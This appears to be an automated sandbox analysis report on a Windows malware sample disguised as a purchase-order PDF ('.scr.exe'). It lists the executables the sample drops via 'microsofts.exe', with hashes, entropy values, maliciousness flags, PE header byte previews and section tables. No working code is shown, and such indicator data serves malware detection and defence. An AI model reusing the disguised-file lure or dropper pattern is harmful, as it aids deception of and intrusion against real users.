SHA-512:7A3099BDE2B5220C7CB7F149DC5F390BC19A35BEE08D4367004ACDE50F42AE9C7822442227C237A7E99A527EA32EDE0A0222CB442104D8813A937112AD1F13E3
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1141248
Entropy (8bit):5.0174977353632935
Encrypted:false
SSDEEP:12288:JbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JbsqjnhMgeiCl7G0nehbGZpbD
MD5:3A5699061E1911C756244F5DD3EFCD56
SHA1:70074B95F949A8C0265DDA261A0B1ACD560B5523
SHA-256:42DA5D5FEB5731E058BACA117605648B44B56E38ACA86F6B7FA7DEB77408891B
SHA-512:EBF011C020675C72F45228AB8823A75F8E0446FE65BE7FA990DB8D13BC1D4692FF25C29D4EC6FE9D73F6CDC3450A173DF4BB58DA6C58D39476570968AE5C4C7A
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msdtc.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.32077789470018403
Encrypted:false
SSDEEP:6:51OT8ta/k/uMclF6vMclFq5zzT1p8Oz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GwB:A80kqF69Fq5zzR2v6CzE5Z2+fqjFzZ
MD5:9F76C8B51793181EF6DCBCD007F8EC88
SHA1:F08FEBF0A2B2693CA311F1A63A3B60256832D539
SHA-256:CD15EC465CE6B0299634F9359D0835B1461B37362479CA338527AD6002BE7967
SHA-512:E449EC923B2B49D7148A49A4A2C76F152B6C21A3ACE5E596D3E781B697F06283C473A5C2FA0F02999B205120C5DE409DD08CB406471E6854AD7D46285B1CE85E
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1511424
Entropy (8bit):5.222899038408326
Encrypted:false
SSDEEP:12288:SObHA4LWOsvAYFTAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:DjL3UTAsqjnhMgeiCl7G0nehbGZpbD
MD5:03402E65F6A814316E26E0D2EB369ABC
SHA1:996604B63BB8E22D5B83E2D2EDD62BA4044F85B3
SHA-256:6487B40BEA3C096F2DFD8094FB2C81563214C518EA639FBF53208C97E4567246
SHA-512:0EDFB75D65471736AC252BA26C8B0DF89756DE5DC9D5BDF52485E871E0E1095E634CD48A46F06133F126C2D1E8B7A954BA6ADFC633A58C303D38A74EF1CCA4B0
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1235968
Entropy (8bit):5.182186754333678
Encrypted:false
SSDEEP:12288:jpFtQO8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eO8sqjnhMgeiCl7G0nehbGZpbD
MD5:367BAC61864EA78BE8F89AAEA741C1B2
SHA1:0C2B4995D738EDFDFA95F06C7EF8B76150ED7D94
SHA-256:8054165642E11A5B2ABB73261EC3153F2326E3CD3A38144C92B4566752455DC5
SHA-512:D73D2AAD9B63C01EECEDF3CA88969B1CE2B8BADF05E4FEBF8C0CCA5348A0107BF7A8A6F3213283C1A1D365CE8A1C248CB55592A4710AD7D5C38B6DE00ED15303
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):7.102366509633962
Encrypted:false
SSDEEP:24576:B3frCoQItLsiLPLe24CxruW4bIhllAsqjnhMgeiCl7G0nehbGZpbD:B3fzsIPLkCNuVbIhD8Dmg27RnWGj
MD5:5433BF918EC0E055F10B17DC543C1E85
SHA1:CB65149CEF53CB230E4D5C0E2049E70F5E754819
SHA-256:020D24ADCF464E09C6ACCA27491F29ECE0582630650C5F2ACA1191C1D3AE61DE
SHA-512:9055E3D7EEEC0C4E3C078A9536CA236E09EAE7989D359012FC3535EB2407B0279389D6C0F69DABE29997A429DA5F3768C48B936C7CCC79EB9B5BF5AEEAEBE8EC
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1846784
Entropy (8bit):6.93943164389688
Encrypted:false
SSDEEP:24576:PW6BApg2YuyuNDYTabvcRvNYf8km1VsqjnhMgeiCl7G0nehbGZpbD:PF2YuHNETovcvNYf8kmzDmg27RnWGj
MD5:A30B8B3725152FFD1FEF45C52D3261B8
SHA1:717C59D7BAB08CCA6D21AE3EC37EA9397C4BA42F
SHA-256:429D646B7FBF0F8E4617135EEFEA5AB1F66DA903B9542F674A93C0E8A38D545F
SHA-512:C883885C01805C29380EE4E98A893EBF476BC8451086FE85776CB5DD8697EE75BEA3127DFA47DEA19A75928D7CB7E0B23B0A6F3A54A9E5951538376F9959085E
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):7.23886611947782
Encrypted:false
SSDEEP:24576:6iW6ZvAKF5i/dN9Bdexj9Trk+F8sqjnhMgeiCl7G0nehbGZpbD:6YxF50b9Bdm9TxSDmg27RnWGj
MD5:2DDE61D6384346F05BA3DA4D78A1740A
SHA1:32E6AEB21855931103B10D8EF964B5925F12B891
SHA-256:A828967B9343566B0EA29E5F3D07B5958CE1F26B8B8FD512919EE7DFE2A9FE6E
SHA-512:253C39E93FA89465B65D9EBB0C22469396E08A35E5CA223EE1D1A0B7C35B3636A709E9C8CA45B83A08266E8351389C37EEE83EFA418C1C57A6FFC078F0DD4547
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):5.4765696821894885
Encrypted:false
SSDEEP:24576:aJnJ5D3WYRsqjnhMgeiCl7G0nehbGZpbD:aJnJ5DGYlDmg27RnWGj
MD5:10F8624709D07DA72863BBB00DFD5D16
SHA1:13BC1B93A66F398F4F037F2FBB24E84C40DEDA35
SHA-256:3D4D571CFDF2A0ABE18DC5E624D5B8342273528599F4990D671F0F1803AF3389
SHA-512:951F229682886A467D64EA84A5CBE6563443AA17FA19E2B3AE22F6BBC3A998E460323107E6C49145C92ECF5660F3B32942A68750E1E809CE6365D7A0BCB035F6
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2075136
Entropy (8bit):6.736556856427155
Encrypted:false
SSDEEP:49152:JPK86JYTerDjfJ2313e1mP1MdnUuDmg27RnWGj:cD527BWG
MD5:6F619B0A7514F05B32A6D786A12B627C
SHA1:9B1F3637812FBE619085D0B55C213776E0A52AB1
SHA-256:48756E0A15EAA52327AF4B604B72983AC7A12F10D063DFF97905BB3E743D8A5D
SHA-512:0D662E9FB72A1389BF11D27E63DBE857C049D899DEBE86AF3947CCF28321F79B2A60DF14830A066F0DD5706C9667BD9A13130D20BC0811ED23E89F04AA81519B
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1225728
Entropy (8bit):5.163302561027
Encrypted:false
SSDEEP:12288:wEP3R6NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:L6NsqjnhMgeiCl7G0nehbGZpbD
MD5:882AAAB29114AA61C89B0726B6FA58A4
SHA1:4AC00DED35C7CA1071E545F372A26E09C6C97726
SHA-256:B43A42562D86A3A44944A30D58C951DA107AE6E6B93E9E0FBA66AE3EBE533DAC
SHA-512:890903983A362DFC1172C09057DAD7B17254D0D88BA339834B99D728773A30A362043102FDE9EEC541F0C4E2297963542393D278884ACCE82AC5E10A8A1BBA04
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................F..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):12320
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985788564928592
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:192:dUVUtyDfPxc7LqoNkbnaIGtEgL4V6zq392XnvvGRt4KyAfB:OWsBc/XRdEgL4IqN2XnHZKyg
                                                                                                                                                                                                                                                                                                          MD5:BEC8EA57B20D5D98E83CAF77F260812B
                                                                                                                                                                                                                                                                                                          SHA1:50D61F97315A0C59AAD28F2ED1678917FCA2A377
                                                                                                                                                                                                                                                                                                          SHA-256:968B21A145F02A294173B696EF9A4683D06067B110E54EB2CD8652DCD739FBDF
                                                                                                                                                                                                                                                                                                          SHA-512:FC723C6788565AF4E9541E05A41075AD610C8C1088EB32747DD98F8C52EAA6053AAEFD6515E7E69752E6C1F42C6E0FCB57DDFD0BBDFA7DC92F24D077FADF189D
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:.._....z:..I...ho.(.M#..LA...p............5.`I.s.F2.d<.....`v.*X..r./X...S.=p....x.?=.....?...aN'......-....3....Q....Qw.P4>z.L...8~by:cY].'..)i.....`...h..2..3...........Y.:khI'...../.@.Sq.klSj.HJ./..2T.h.L ^c.."..jK3y~.%.nd.D5r.c..7.h..r.'@)h`.\5.n.*6..@ ......22.....Y..1...,.=.#.0.n......~.....W..A).1.v..>...=Q.....o.e.;y.{J..*%g.....7&.u.+..-.....cwc.....;.Y..c[.:LJ...5?xm.Pc.!.$S9.u.R.....~}>'=.13.H...D`.P]..vAP5....d...S..o.....$MBk-a....3.....;...^...3.n...._....l.,>..%.QsO.;."Y.]Y......E+....ib.`......r..t.........j..:.r.e.2aG......De.ECB...x9..._.<$..M.@...Z....x.....2iv...0f.cu[.ff..L.\...+O..f..E9b.*..4I..BED...&I.G..:}..(.U-.k.: ...}m....:yz..........M.h.._.....z..;m.KP]......H..q....sm....V7......7...".C.........;..v./.Z...z.....>...W2....j..x...l.0...u.'.j..BFn<..^#i"...^.]@.._.....,.3...:.er....._...I~..H.vL...S...R."a...L.Pf..Cm....J......>.M.....(.\.I.......$.M.7..........F.'..Y?k.7..m...-..I...u..RNw..9I
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1278464
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.142973799123246
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:gjkyOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gIyOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:46966EB01AA74C66C8C45009CAFCA510
                                                                                                                                                                                                                                                                                                          SHA1:A602134E9EBFE7A2C2ADA2A82DA1A66FD7C9159A
                                                                                                                                                                                                                                                                                                          SHA-256:C0112E3364E3C01F07CEFEA91CDFC793F16978C3B40DE134A10CBEDA7725EDBB
                                                                                                                                                                                                                                                                                                          SHA-512:17B1E1922CA59EBF52DD283B6F0C62FDD7E640EF77563FC7F79CD1C2C3FFD32AA81EB4A49624AE082643E45ACD2B1548A8DC21C52A8473EF5DAA0D506406D617
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................O..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1199616
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.08387369690794
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:D4DAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:86D582B0ECF35EF636F3491BD428BDC5
                                                                                                                                                                                                                                                                                                          SHA1:CF151A189729808A417432D0C836B0A2E525BE48
                                                                                                                                                                                                                                                                                                          SHA-256:199719B3931CA4539B2FC8DA33D331350CFAEFC359610B6C60CF994FD6088F38
                                                                                                                                                                                                                                                                                                          SHA-512:CA5D4E47D3A41F4BA72FBAE454B63028C894F4B1F1169251F4309E0A856EB9DA3A8000BDC0B199238AC0FFE50B500F0FF4A04FAE0E9A9AEDA8B7D7F99C358A9A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.....................................A.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1146880
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.027564530955829
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:c9sXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:7D3200FA5E7F0DAE65D4ECB41018A0E8
                                                                                                                                                                                                                                                                                                          SHA1:44E4C8D26492F56FCF16662D9644D696AA523594
                                                                                                                                                                                                                                                                                                          SHA-256:970093E047CDFE219D2979674FBFB97520AA2955E4056393F368F98F20C72515
                                                                                                                                                                                                                                                                                                          SHA-512:150048C1CDE6CA9C4BCA0CAC1D3C090C4AF3A2DACB7C395CE296036061FA3759646C4C192B4BDC25D2B5ED230BC19F16FD7056E9335B2BC0B53CB23D0C7C7D9F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................O..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1303552
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.1715434456254865
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:6Z0FxT1UoYr99GdcpK9sqjnhMgeiCl7G0nehbGZpbD:awWchDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:2EE227E57FDD41A436C3DE33802B4D02
                                                                                                                                                                                                                                                                                                          SHA1:A1C4268025E7FAF9578030BAEB9F3E8F0595A8E6
                                                                                                                                                                                                                                                                                                          SHA-256:AFFCED0E1A35D3F9D089CF5F53154201D3EBDB7461B48061E04C14D94E75E818
                                                                                                                                                                                                                                                                                                          SHA-512:4B59586059618118162BCBCD77DAA17BABD5699DF3E0651A964D407927FDD2A2FF86A7A83A7D33F2E2E35D4BC5515ED478A1F01F7DE0247DF745D0FE089CBC8D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@............ .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1339392
Entropy (8bit): 5.269280775353156
Encrypted: false
SSDEEP: 12288:uyoKo2fRple9pWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:uyocJApWsqjnhMgeiCl7G0nehbGZpbD
MD5: 9A8EBFF61D4C0DF5B3817CC977D59B89
SHA1: 85777D55E313A6FF56AA05B7DD28FC57F28E3438
SHA-256: 2231F5BE7C7F04E6FA002C27760B2BED1B0D003D323BC94972C406CCC39AFBDB
SHA-512: 0A8C3CE9FE3D7B9CF33E83BA35B07A1BF6AC1D594AB6D83E4495D56798062C681C60C96147F5A5AC14293DF01322093A3CDFCD58AA653C45802C1635FC76B357
Malicious: true
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2164736
Entropy (8bit): 7.062019463054502
Encrypted: false
SSDEEP: 49152:lWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKODmg27RnWGj:V0zuNI6D527BWG
MD5: 21B54458FED133A5634A8ABCCB5B5220
SHA1: 638570CA2318C82D43F873DDB45AFA9CC528E538
SHA-256: 64B92A9774D23B9FB1B46706DCBD62D97D331BCDB89CDD29B23A28C34ECD9EF6
SHA-512: 5E5A9E4DF5B6A24FAB63F7A72D1916FFD38F622972CF044D483E3F08ACB14FEB0EC816EE363ECBA7B5EA92ECB2132CBB68B9CB099FDF50A3F8A1D13F6DC7BD80
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\Spectrum.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.10018034009343514
Encrypted: false
SSDEEP: 12:swlX6V/kqF69Fq5zzRm+X9O+pawHymQMlXf:u81+tO+pBHytk
MD5: 8CE2D116648DA5E165A1E0DF55D3F6F0
SHA1: 6825C96267E076DB4DC2F550B537A3BA19BCAE3F
SHA-256: A9779496B4EBDB0F5039BE92CC3ADB6FF08D159A6D8E454F56803DC9D70F1191
SHA-512: FCA6C7BA1689E65EA26973B3FD15DB964B8F958F0CD0CCF1FE060B05977863FC1C723C8F1A888159EFEE9D65B309C850160A307A04D17141F4775BEC944DA151
Malicious: false
Reputation: unknown
Process: C:\Windows\System32\Spectrum.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.1014153971288612
Encrypted: false
SSDEEP: 12:Vl6rcX6V/kqF69Fq5zzRgRl9X+pawHyIVcXX:Vl6v81HnX+pBHyIC
MD5: B67C6BB081C4C63FA4AA94714D1BE095
SHA1: 6DDDCB22F8E75ED904B1EFDF41D1F36062B8EE5F
SHA-256: 9671A7F5EC877F8EC13157ED9E4AB525E4503CF93499D44DBEF9DC1A674528C8
SHA-512: 67FEE80517E74469B8F7F7BE7B74A5EE90B7CA89D86CDDA98B8A6A84C68638139899062337F8B898F39584FEE965871E5A2151B8AD7953EC616CB266B5166AA4
Malicious: false
Reputation: unknown
Process: C:\Windows\System32\Spectrum.exe
File Type: data
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.09892701128127847
Encrypted: false
SSDEEP: 12:uU9WlX69kqF69Fq5zzRD9I+pawHyvJ9WlXn:uUQ1yI+pBHyvJM
MD5: 93C58B2BCE84680AD78DB25FF856E5E5
SHA1: 2646597C86C97A48D9B82B865E0C1874FAC7D78F
SHA-256: 1C1DC661563EAE89A4B4E84900921D070E9B734B9A0C2F5C3CE7272675CE569C
SHA-512: 9C91ACBEC423E9707790E5C29822BBAA5675CCDA24E7E6A3A55DE3EBE80C687E90210A75237AF5927003B79E4AE1A363B97AC232C1FEA380EA54538BD3AB000A
Malicious: false
Reputation: unknown
Process: C:\Windows\SysWOW64\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 66
Entropy (8bit): 4.524640141725149
Encrypted: false
SSDEEP: 3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5: 04A92849F3C0EE6AC36734C600767EFA
SHA1: C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256: 28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512: 6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious: false
Reputation: unknown
Preview: ..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.861093863784533
                                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                                                                                                                                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                          File name:PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                          File size:6'536'429 bytes
                                                                                                                                                                                                                                                                                                          MD5:2940b15a52c0aaa97db24e4043ffffcf
                                                                                                                                                                                                                                                                                                          SHA1:fa29bd64c6fd9ca4811db98aa8608691cb0324c3
                                                                                                                                                                                                                                                                                                          SHA256:6cb077ac45cc280c1ace4f4b7f7ec0feb23487074ac50e0113ade7e9509dbb85
                                                                                                                                                                                                                                                                                                          SHA512:24303a2138d8a58bc501e24931d75fe9368db57a1f01244a90a6d580c9a8199547b734c31d8697e0b6912e5e829a0be1aa1c397f3b56bd9161e2c4736e1637c3
                                                                                                                                                                                                                                                                                                          SSDEEP:98304:r3v+7+QLirU/OpUYI+Lclg5xlmq4daschTJwEHjwxFD+z4N3vS:rf+6mir1e+Lci5xYLErTJPEFD+sN3vS
                                                                                                                                                                                                                                                                                                          TLSH:0766026472EAC128EFF27F3AC4D15119E170FC63E95A6A11A2FA77122677F800537782
                                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                                                                                                                                                                                                                                          Icon Hash:22ecc8ececc8e4a7
                                                                                                                                                                                                                                                                                                          Entrypoint:0x416310
                                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                          Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                          Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                                          add edi, 03h
                                                                                                                                                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                                                                                                                                                          jc 00007F28C06D5B2Eh
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x5d528 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x5d528 | 0x5d600 | e3b77aaf1a8e36a7b68570c4bf63ab97 | False | 0.026967243975903613 | data | 3.232973918989002 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
